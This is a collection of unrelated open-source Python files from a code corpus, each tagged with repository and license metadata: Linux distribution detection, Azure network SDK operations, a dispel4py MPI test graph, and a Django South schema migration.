},
'like': 'fedora',
'codename': 'Maipo'
}
The dictionary structure and keys are always the same, regardless of which
information items are available in the underlying data sources. The values
for the various keys are as follows:
* ``id``: The result of :func:`distro.id`.
* ``version``: The result of :func:`distro.version`.
* ``version_parts -> major``: The result of :func:`distro.major_version`.
* ``version_parts -> minor``: The result of :func:`distro.minor_version`.
* ``version_parts -> build_number``: The result of
:func:`distro.build_number`.
* ``like``: The result of :func:`distro.like`.
* ``codename``: The result of :func:`distro.codename`.
For a description of the *pretty* and *best* parameters, see the
:func:`distro.version` method.
"""
return _distro.info(pretty, best)
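# Illustrative sketch (not part of the public API): consuming the
# dictionary returned by info(). The key layout follows the docstring
# above; the concrete values depend on the distro this runs on.
def _example_info_summary(best=False):
    """Return a one-line summary such as 'rhel 7.0 (Maipo)'."""
    data = info(best=best)
    summary = '{0} {1}'.format(data['id'], data['version'])
    if data['codename']:
        summary += ' ({0})'.format(data['codename'])
    return summary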
def os_release_info():
"""
Return a dictionary containing key-value pairs for the information items
from the os-release file data source of the current Linux distribution.
See `os-release file`_ for details about these information items.
"""
return _distro.os_release_info()
def lsb_release_info():
"""
Return a dictionary containing key-value pairs for the information items
from the lsb_release command data source of the current Linux distribution.
See `lsb_release command output`_ for details about these information
items.
"""
return _distro.lsb_release_info()
def distro_release_info():
"""
Return a dictionary containing key-value pairs for the information items
from the distro release file data source of the current Linux distribution.
See `distro release file`_ for details about these information items.
"""
return _distro.distro_release_info()
def os_release_attr(attribute):
"""
Return a single named information item from the os-release file data source
of the current Linux distribution.
Parameters:
* ``attribute`` (string): Key of the information item.
Returns:
* (string): Value of the information item, if the item exists.
The empty string, if the item does not exist.
See `os-release file`_ for details about these information items.
"""
return _distro.os_release_attr(attribute)
def lsb_release_attr(attribute):
"""
Return a single named information item from the lsb_release command output
data source of the current Linux distribution.
Parameters:
* ``attribute`` (string): Key of the information item.
Returns:
* (string): Value of the information item, if the item exists.
The empty string, if the item does not exist.
See `lsb_release command output`_ for details about these information
items.
"""
return _distro.lsb_release_attr(attribute)
def distro_release_attr(attribute):
"""
Return a single named information item from the distro release file
data source of the current Linux distribution.
Parameters:
* ``attribute`` (string): Key of the information item.
Returns:
* (string): Value of the information item, if the item exists.
The empty string, if the item does not exist.
See `distro release file`_ for details about these information items.
"""
return _distro.distro_release_attr(attribute)
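# Illustrative sketch (not part of the public API): the single source
# accessor functions above make it easy to see which data source a
# value came from, mirroring the lookup hierarchy documented for id().
def _example_id_sources():
    """Return the raw distro ID as reported by each data source."""
    return {
        'os-release': os_release_attr('id'),
        'lsb_release': lsb_release_attr('distributor_id'),
        'distro-release-file': distro_release_attr('id'),
    }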
class LinuxDistribution(object):
"""
Provides information about a Linux distribution.
This package creates a private module-global instance of this class with
default initialization arguments, that is used by the
`consolidated accessor functions`_ and `single source accessor functions`_.
By using default initialization arguments, that module-global instance
returns data about the current Linux distribution (i.e. the distro this
package runs on).
Normally, it is not necessary to create additional instances of this class.
However, in situations where control is needed over the exact data sources
that are used, instances of this class can be created with a specific
distro release file, or a specific os-release file, or without invoking the
lsb_release command.
"""
def __init__(self,
include_lsb=True,
os_release_file='',
distro_release_file=''):
"""
The initialization method of this class gathers information from the
available data sources, and stores that in private instance attributes.
Subsequent access to the information items uses these private instance
attributes, so that the data sources are read only once.
Parameters:
* ``include_lsb`` (bool): Controls whether the
`lsb_release command output`_ is included as a data source.
If the lsb_release command is not available in the program execution
path, the data source for the lsb_release command will be empty.
* ``os_release_file`` (string): The path name of the
`os-release file`_ that is to be used as a data source.
An empty string (the default) will cause the default path name to
be used (see `os-release file`_ for details).
If the specified or defaulted os-release file does not exist, the
data source for the os-release file will be empty.
* ``distro_release_file`` (string): The path name of the
`distro release file`_ that is to be used as a data source.
An empty string (the default) will cause a default search algorithm
to be used (see `distro release file`_ for details).
If the specified distro release file does not exist, or if no default
distro release file can be found, the data source for the distro
release file will be empty.
Public instance attributes:
* ``os_release_file`` (string): The path name of the
`os-release file`_ that is actually used as a data source. The
empty string if no distro release file is used as a data source.
* ``distro_release_file`` (string): The path name of the
`distro release file`_ that is actually used as a data source. The
empty string if no distro release file is used as a data source.
Raises:
* :py:exc:`IOError`: Some I/O issue with an os-release file or distro
release file.
* :py:exc:`subprocess.CalledProcessError`: The lsb_release command had
some issue (other than not being available in the program execution
path).
* :py:exc:`UnicodeError`: A data source has unexpected characters or
uses an unexpected encoding.
"""
self.os_release_file = os_release_file or \
os.path.join(_UNIXCONFDIR, _OS_RELEASE_BASENAME)
self.distro_release_file = distro_release_file or '' # updated later
self._os_release_info = self._get_os_release_info()
self._lsb_release_info = self._get_lsb_release_info() \
if include_lsb else {}
self._distro_release_info = self._get_distro_release_info()
def __repr__(self):
"""Return repr of all info
"""
return \
"LinuxDistribution(" \
"os_release_file={0!r}, " \
"distro_release_file={1!r}, " \
"_os_release_info={2!r}, " \
"_lsb_release_info={3!r}, " \
"_distro_release_info={4!r})".format(
self.os_release_file,
self.distro_release_file,
self._os_release_info,
self._lsb_release_info,
self._distro_release_info)
def linux_distribution(self, full_distribution_name=True):
"""
Return information about the Linux distribution that is compatible
with Python's :func:`platform.linux_distribution`, supporting a subset
of its parameters.
For details, see :func:`distro.linux_distribution`.
"""
return (
self.name() if full_distribution_name else self.id(),
self.version(),
self.codename()
)
def id(self):
"""Return the distro ID of the Linux distribution, as a string.
For details, see :func:`distro.id`.
"""
def normalize(distro_id, table):
distro_id = distro_id.lower().replace(' ', '_')
return table.get(distro_id, distro_id)
distro_id = self.os_release_attr('id')
if distro_id:
return normalize(distro_id, NORMALIZED_OS_ID)
distro_id = self.lsb_release_attr('distributor_id')
if distro_id:
return normalize(distro_id, NORMALIZED_LSB_ID)
distro_id = self.distro_release_attr('id')
if distro_id:
return normalize(distro_id, NORMALIZED_DISTRO_ID)
return ''
def name(self, pretty=False):
"""
Return the name of the Linux distribution, as a string.
For details, see :func:`distro.name`.
"""
name = self.os_release_attr('name') \
or self.lsb_release_attr('distributor_id') \
or self.distro_release_attr('name')
if pretty:
name = self.os_release_attr('pretty_name') \
or self.lsb_release_attr('description')
if not name:
name = self.distro_release_attr('name')
version = self.version(pretty=True)
if version:
name = name + ' ' + version
return name or ''
def version(self, pretty=False, best=False):
"""
Return the version of the Linux distribution, as a string.
For details, see :func:`distro.version`.
"""
versions = [
self.os_release_attr('version_id'),
self.lsb_release_attr('release'),
self.distro_release_attr('version_id'),
self._parse_distro_release_content(
self.os_release_attr('pretty_name')).get('version_id', ''),
self._parse_distro_release_content(
self.lsb_release_attr('description')).get('version_id', '')
]
version = ''
if best:
# This algorithm uses the last version in priority order that has
# the best precision. If the versions are not in conflict, that
# does not matter; otherwise, using the last one instead of the
# first one might be considered a surprise.
for v in versions:
if v.count(".") > version.count(".") or version == '':
version = v
else:
for v in versions:
if v != '':
version = v
break
if pretty and version and self.codename():
version = u'{0} ({1})'.format(version, self.codename())
return version
def version_parts(self, best=False):
"""
Return the version of the Linux distribution, as a tuple of version
numbers.
For details, see :func:`distro.version_parts`.
"""
version_str = self.version(best=best)
if version_str:
version_regex = re.compile(r'(\d+)\.?(\d+)?\.?(\d+)?')
matches = version_regex.match(version_str)
if matches:
major, minor, build_number = matches.groups()
return major, minor or '', build_number or ''
return '', '', ''
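# For example (illustrative): with a version string of '7.1.1503' the
# regular expression above yields ('7', '1', '1503'), and with '16.04'
# it yields ('16', '04', '').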
def major_version(self, best=False):
"""
Return the major version number of the current distribution.
For details, see :func:`distro.major_version`.
"""
return self.version_parts(best)[0]
def minor_version(self, best=False):
"""
Return the minor version number of the Linux distribution.
For details, see :func:`distro.minor_version`.
"""
return self.version_parts(best)[1]
def build_number(self, best=False):
"""
Return the build number of the Linux distribution.
For details, see :func:`distro.build_number`.
"""
return self.version_parts(best)[2]
def like(self):
"""
Return the IDs of distributions that are like the Linux distribution.
For details, see :func:`distro.like`.
"""
return self.os_release_attr('id_like') or ''
def codename(self):
"""
Return the codename of the Linux distribution.
For details, see :func:`distro.codename`.
"""
return self.os_release_attr('codename') \
or self.lsb_release_attr('codename') \
or self.distro_release_attr('codename') \
or ''
def info(self, pretty=False, best=False):
"""
Return certain machine-readable information about the Linux
distribution.
For details, see :func:`distro.info`.
"""
return dict(
id=self.id(),
version=self.version(pretty, best),
version_parts=dict(
major=self.major_version(best),
minor=self.minor_version(best),
build_number=self.build_number(best)
),
like=self.like(),
codename=self.codename(),
)
def os_release_info(self):
"""
Return a dictionary containing key-value pairs for the information
items from the os-release file data source of the Linux distribution.
For details, see :func:`distro.os_release_info`.
"""
return self._os_release_info
def lsb_release_info(self):
"""
Return a dictionary containing key-value pairs for the information
items from the lsb_release command data source of the Linux
distribution.
For details, see :func:`distro.lsb_release_info`.
"""
return self._lsb_release_info
def distro_release_info(self):
"""
Return a dictionary containing key-value pairs for the information
items from the distro release file data source of the Linux
distribution.
For details, see :func:`distro.distro_release_info`.
"""
return self._distro_release_info
def os_release_attr(self, attribute):
"""
Return a single named information item from the os-release file data
source of the Linux distribution.
For details, see :func:`distro.os_release_attr`.
"""
return self._os_release_info.get(attribute, '')
def lsb_release_attr(self, attribute):
"""
Return a single named information item from the lsb_release command
output data source of the Linux distribution.
For details, see :func:`distro.lsb_release_attr`.
"""
return self._lsb_release_info.get(attribute, '')
def distro_release_attr(self, attribute):
"""
Return a single named information item from the distro release file
data source of the Linux distribution.
For details, see :func:`distro.distro_release_attr`.
"""
return self._distro_release_info.get(attribute, '')
def _get_os_release_info(self):
"""
Get the information items from the specified os-release file.
Returns:
A dictionary containing all information items.
"""
if os.path.isfile(self.os_release_file):
with open(self.os_release_file) as release_file:
return self._parse_os_release_content(release_file)
return {}
@staticmethod
def _parse_os_release_content(lines):
"""
Parse the lines of an os-release file.
Parameters:
* lines: Iterable through the lines in the os-release file.
Each line must be a unicode string or a UTF-8 encoded byte
string.
Returns:
A dictionary containing all information items.
"""
props = {}
lexer = shlex.shlex(lines, posix=True)
lexer.whitespace_split = True
# The shlex module defines its `wordchars` variable using literals,
# making it dependent on the encoding of the Python source file.
# In Python 2.6 and 2.7, the shlex source file is encoded in
# 'iso-8859-1', and the `wordchars` variable is defined as a byte
# string. This causes a UnicodeDecodeError to be raised when the
# parsed content is a unicode object. The following fix resolves that
# (... but it should be fixed in shlex...):
if sys.version_info[0] == 2 and isinstance(lexer.wordchars, bytes):
lexer.wordchars = lexer.wordchars.decode('iso-8859-1')
tokens = list(lexer)
for token in tokens:
# At this point, all shell-like parsing has been done (i.e.
# comments processed, quotes and backslash escape sequences
# processed, multi-line values assembled, trailing newlines
# stripped, etc.), so the tokens are now either:
# * variable assignments: var=value
# * commands or their arguments (not allowed in os-release)
if '=' in token:
k, v = token.split('=', 1)
if isinstance(v, bytes):
v = v.decode('utf-8')
props[k.lower()] = v
if k == 'VERSION':
# this handles cases in which the codename is in
# the `(CODENAME)` (rhel, centos, fedora) format
# or in the `, CODENAME` format (Ubuntu).
codename = re.search(r'(\(\D+\))|,(\s+)?\D+', v)
if codename:
codename = codename.group()
codename = codename.strip('()')
codename = codename.strip(',')
codename = codename.strip()
# codename appears within parentheses.
props['codename'] = codename
else:
props['codename'] = ''
else:
# Ignore any tokens that are not variable assignments
pass
return props
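# Illustrative example (values hypothetical): given os-release content
#
#   NAME="Ubuntu"
#   VERSION="16.04.3 LTS (Xenial Xerus)"
#
# _parse_os_release_content() returns
#
#   {'name': 'Ubuntu',
#    'version': '16.04.3 LTS (Xenial Xerus)',
#    'codename': 'Xenial Xerus'}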
def _get_lsb_release_info(self):
"""
Get the information items from the lsb_release command output.
Returns:
A dictionary containing all information items.
"""
cmd = 'lsb_release -a'
process = subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
stdout, stderr = stdout.decode('utf-8'), stderr.decode('utf-8')
code = process.returncode
if code == 0:
content = stdout.splitlines()
return self._parse_lsb_release_content(content)
elif code == 127: # Command not found
return {}
else:
if sys.version_info[:2] >= (3, 5):
raise subprocess.CalledProcessError(code, cmd, stdout, stderr)
elif sys.version_info[:2] >= (2, 7):
raise subprocess.CalledProcessError(code, cmd, stdout)
elif sys.version_info[:2] == (2, 6):
raise subprocess.CalledProcessError(code, cmd)
@staticmethod
def _parse_lsb_release_content(lines):
"""
Parse the output of the lsb_release command.
Parameters:
* lines: Iterable through the lines of the lsb_release output.
Each line must be a unicode string or a UTF-8 encoded byte
string.
Returns:
A dictionary containing all information items.
"""
props = {}
for line in lines:
line = line.decode('utf-8') if isinstance(line, bytes) else line
kv = line.strip('\n').split(':', 1)
if len(kv) != 2:
# Ignore lines without colon.
continue
k, v = kv
props.update({k.replace(' ', '_').lower(): v.strip()})
return props
def _get_distro_release_info(self):
"""
Get the information items from the specified distro release file.
Returns:
A dictionary containing all information items.
"""
if self.distro_release_file:
# If it was specified, we use it and parse what we can, even if
# its file name or content does not match the expected pattern.
distro_info = self._parse_distro_release_file(
self.distro_release_file)
basename = os.path.basename(self.distro_release_file)
# The file name pattern for user-specified distro release files
# is somewhat more tolerant (compared to when searching for the
# file), because we want to use what was specified as best as
# possible.
match = _DISTRO_RELEASE_BASENAME_PATTERN.match(basename)
if match:
distro_info['id'] = match.group(1)
return distro_info
else:
basenames = os.listdir(_UNIXCONFDIR)
# We sort for repeatability in cases where there are multiple
# distro-specific files; e.g. CentOS, Oracle, and Enterprise all
# ship `redhat-release` on top of their own.
basenames.sort()
for basename in basenames:
if basename in _DISTRO_RELEASE_IGNORE_BASENAMES:
continue
match = _DISTRO_RELEASE_BASENAME_PATTERN.match(basename)
if match:
filepath = os.path.join(_UNIXCONFDIR, basename)
distro_info = self._parse_distro_release_file(filepath)
if 'name' in distro_info:
# The name is always present if the pattern matches
self.distro_release_file = filepath
distro_info['id'] = match.group(1)
return distro_info
return {}
def _parse_distro_release_file(self, filepath):
"""
Parse a distro release file.
Parameters:
* filepath: Path name of the distro release file.
Returns:
A dictionary containing all information items.
"""
if os.path.isfile(filepath):
with open(filepath) as fp:
# Only parse the first line. For instance, on SLES there
# are multiple lines. We don't want them...
return self._parse_distro_release_content(fp.readline())
return {}
@staticmethod
def _parse_distro_release_content(line):
"""
Parse a line from a distro release file.
Parameters:
* line: Line from the distro release file. Must be a unicode string
or a UTF-8 encoded byte string.
Returns:
A dictionary containing all information items.
"""
if isinstance(line, bytes):
line = line.decode('utf-8')
matches = _DISTRO_RELEASE_CONTENT_REVERSED_PATTERN.match(
line.strip()[::-1])
distro_info = {}
if matches:
# regexp ensures non-None
distro_info['name'] = matches.group(3)[::-1]
if matches.group(2):
distro_info['version_id'] = matches.group(2)[::-1]
if matches.group(1):
distro_info['codename'] = matches.group(1)[::-1]
elif line:
distro_info['name'] = line.strip()
return distro_info
_distro = LinuxDistribution()
def main():
import argparse
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler(sys.stdout))
parser = argparse.ArgumentParser(description="Linux distro info tool")
parser.add_argument(
'--json',
'-j',
help="Output in machine readable format",
action="store_true")
args = parser.parse_args()
if args.json:
logger.info(json.dumps(info(), indent=4, sort_keys=True))
else:
logger.info('Name: %s', name(pretty=True))
distribution_version = version(pretty=True)
if distribution_version:
logger.info('Version: %s', distribution_version)
distribution_codename = codename()
if distribution_codename:
logger.info('Codename: %s', distribution_codename)
if __name__ == '__main__':
main()
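# Illustrative command-line usage (assumption: this file is saved as
# distro.py on a Linux host; the output shown is hypothetical):
#
#   $ python distro.py
#   Name: CentOS Linux 7.1.1503 (Core)
#   Version: 7.1.1503 (Core)
#   Codename: Core
#
#   $ python distro.py --json
#   {
#       "codename": "Core",
#       "id": "centos",
#       "like": "rhel fedora",
#       "version": "7.1.1503",
#       "version_parts": {
#           "build_number": "1503",
#           "major": "7",
#           "minor": "1"
#       }
#   }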
|
gpl-3.0
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/aio/operations/_hub_virtual_network_connections_operations.py
|
1
|
8982
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class HubVirtualNetworkConnectionsOperations:
"""HubVirtualNetworkConnectionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
virtual_hub_name: str,
connection_name: str,
**kwargs
) -> "_models.HubVirtualNetworkConnection":
"""Retrieves the details of a HubVirtualNetworkConnection.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:param connection_name: The name of the vpn connection.
:type connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: HubVirtualNetworkConnection, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_02_01.models.HubVirtualNetworkConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.HubVirtualNetworkConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
'connectionName': self._serialize.url("connection_name", connection_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('HubVirtualNetworkConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/hubVirtualNetworkConnections/{connectionName}'} # type: ignore
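# Illustrative usage sketch (the client object and resource names are
# hypothetical placeholders; this class is reached as an attribute of
# the service client, as noted in the class docstring):
#
#   conn = await client.hub_virtual_network_connections.get(
#       "my-resource-group", "my-virtual-hub", "my-connection")
#   print(conn.name)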
def list(
self,
resource_group_name: str,
virtual_hub_name: str,
**kwargs
) -> AsyncIterable["_models.ListHubVirtualNetworkConnectionsResult"]:
"""Retrieves the details of all HubVirtualNetworkConnections.
:param resource_group_name: The resource group name of the VirtualHub.
:type resource_group_name: str
:param virtual_hub_name: The name of the VirtualHub.
:type virtual_hub_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListHubVirtualNetworkConnectionsResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_02_01.models.ListHubVirtualNetworkConnectionsResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListHubVirtualNetworkConnectionsResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListHubVirtualNetworkConnectionsResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/hubVirtualNetworkConnections'} # type: ignore
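# Illustrative usage sketch (assumptions: the aio NetworkManagementClient
# that accompanies this operations class, and azure-identity for the
# credential; all names are placeholders):
#
#   from azure.identity.aio import DefaultAzureCredential
#   from azure.mgmt.network.v2019_02_01.aio import NetworkManagementClient
#
#   async def show_connections():
#       async with NetworkManagementClient(
#               DefaultAzureCredential(), "<subscription-id>") as client:
#           async for conn in client.hub_virtual_network_connections.list(
#                   "my-resource-group", "my-virtual-hub"):
#               print(conn.name)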
|
mit
|
KNMI/VERCE
|
verce-hpc-pe/src/test/graph_testing/grouping_alltoone.py
|
3
|
4256
|
'''
This is a dispy graph which produces a workflow with a pipeline
in which the producer node ``prod`` sends data to the consumer node ``cons1``, which then sends data to node ``cons2``.
Note that in this graph we have defined several instances of the cons1 and cons2 nodes,
and all the instances of the cons1 node send data to only one instance of the cons2 node.
This type of grouping is called *global* in dispy (all to one).
It can be executed with MPI and STORM.
* MPI: Please navigate to the dispy directory.
Execute the MPI mapping as follows::
mpiexec -n <number mpi_processes> python -m dispel4py.worker_mpi <name_dispy_graph> <-f file containing the input dataset in JSON format>
<-i number of iterations/runs'> <-s>
The argument '-s' forces the graph to run in simple processing mode, which means that the first node of the graph is executed in one process, and the remaining nodes are executed in a second process.
When <-i number of iterations/runs> is not specified, the graph is executed once by default.
For example::
mpiexec -n 11 python -m dispel4py.worker_mpi test.graph_testing.grouping_alltoone -i 10
.. note::
Each node in the graph is executed as a separate MPI process.
This graph has 11 nodes. For this reason, we need at least 11 MPI processes to execute it.
Output::
Processing 10 iterations
Processes: {'TestProducer0': [5], 'TestOneInOneOut2': [6, 7, 8, 9, 10], 'TestOneInOneOut1': [0, 1, 2, 3, 4]}
TestOneInOneOut1 (rank 0): I'm a bolt
TestOneInOneOut1 (rank 1): I'm a bolt
TestOneInOneOut2 (rank 9): I'm a bolt
TestOneInOneOut1 (rank 2): I'm a bolt
TestOneInOneOut1 (rank 4): I'm a bolt
TestOneInOneOut1 (rank 3): I'm a bolt
TestProducer0 (rank 5): I'm a spout
TestOneInOneOut2 (rank 7): I'm a bolt
Rank 5: Sending terminate message to [0, 1, 2, 3, 4]
TestProducer0 (rank 5): Processed 10 input block(s)
TestProducer0 (rank 5): Completed.
TestOneInOneOut1 (rank 3): Processed 2 input block(s)
TestOneInOneOut1 (rank 3): Completed.
TestOneInOneOut1 (rank 1): Processed 2 input block(s)
TestOneInOneOut1 (rank 1): Completed.
TestOneInOneOut1 (rank 4): Processed 2 input block(s)
TestOneInOneOut1 (rank 4): Completed.
TestOneInOneOut1 (rank 2): Processed 2 input block(s)
TestOneInOneOut1 (rank 2): Completed.
Rank 0: Sending terminate message to [6, 7, 8, 9, 10]
TestOneInOneOut1 (rank 0): Processed 2 input block(s)
TestOneInOneOut1 (rank 0): Completed.
TestOneInOneOut2 (rank 8): I'm a bolt
TestOneInOneOut2 (rank 8): Processed 0 input block(s)
TestOneInOneOut2 (rank 8): Completed.
TestOneInOneOut2 (rank 9): Processed 0 input block(s)
TestOneInOneOut2 (rank 9): Completed.
TestOneInOneOut2 (rank 7): Processed 0 input block(s)
TestOneInOneOut2 (rank 7): Completed.
TestOneInOneOut2 (rank 10): I'm a bolt
TestOneInOneOut2 (rank 10): Processed 0 input block(s)
TestOneInOneOut2 (rank 10): Completed.
TestOneInOneOut2 (rank 6): I'm a bolt
TestOneInOneOut2 (rank 6): Processed 10 input block(s)
TestOneInOneOut2 (rank 6): Completed.
Note that only one instance of the consumer node ``TestOneInOneOut2`` (rank 6) received all the input blocks from the previous PE,
as the grouping has been defined as `global`.
* STORM:
'''
from test.graph_testing import testing_PEs as t
from dispel4py.workflow_graph import WorkflowGraph
def testAlltoOne():
'''
Creates a graph with two consumer nodes and a global grouping.
:return: the created graph
'''
graph = WorkflowGraph()
prod = t.TestProducer()
cons1 = t.TestOneInOneOut()
cons2 = t.TestOneInOneOut()
cons1.numprocesses = 5
cons2.numprocesses = 5
graph.connect(prod, 'output', cons1, 'input')
cons2.inputconnections['input']['grouping'] = 'global'
graph.connect(cons1, 'output', cons2, 'input')
return graph
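# Illustrative variant (not part of the original test): the same pipeline
# without the 'global' grouping, so the input blocks of cons2 are
# distributed across all of its instances instead of a single one.
def testAlltoOneWithoutGrouping():
    '''
    Creates the same two-consumer graph but leaves the default grouping
    in place on cons2.
    :return: the created graph
    '''
    graph = WorkflowGraph()
    prod = t.TestProducer()
    cons1 = t.TestOneInOneOut()
    cons2 = t.TestOneInOneOut()
    cons1.numprocesses = 5
    cons2.numprocesses = 5
    graph.connect(prod, 'output', cons1, 'input')
    graph.connect(cons1, 'output', cons2, 'input')
    return graph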
''' important: this is the graph_variable '''
graph = testAlltoOne()
|
mit
|
Squishymedia/feedingdb
|
src/feeddb/feed/migrations/0058_muscleowl_emg_sono.py
|
1
|
40048
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'SonoSensor.muscle'
db.add_column(u'feed_sonosensor', 'muscle',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feed.MuscleOwl'], null=True),
keep_default=False)
# Adding field 'EmgSensor.muscle'
db.add_column(u'feed_emgsensor', 'muscle',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feed.MuscleOwl'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'SonoSensor.muscle'
db.delete_column(u'feed_sonosensor', 'muscle_id')
# Deleting field 'EmgSensor.muscle'
db.delete_column(u'feed_emgsensor', 'muscle_id')
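# Illustrative usage (standard South workflow; the app label 'feed' is
# taken from the table names below):
#
#   ./manage.py migrate feed 0058   # apply forwards()
#   ./manage.py migrate feed 0057   # roll back via backwards()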
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
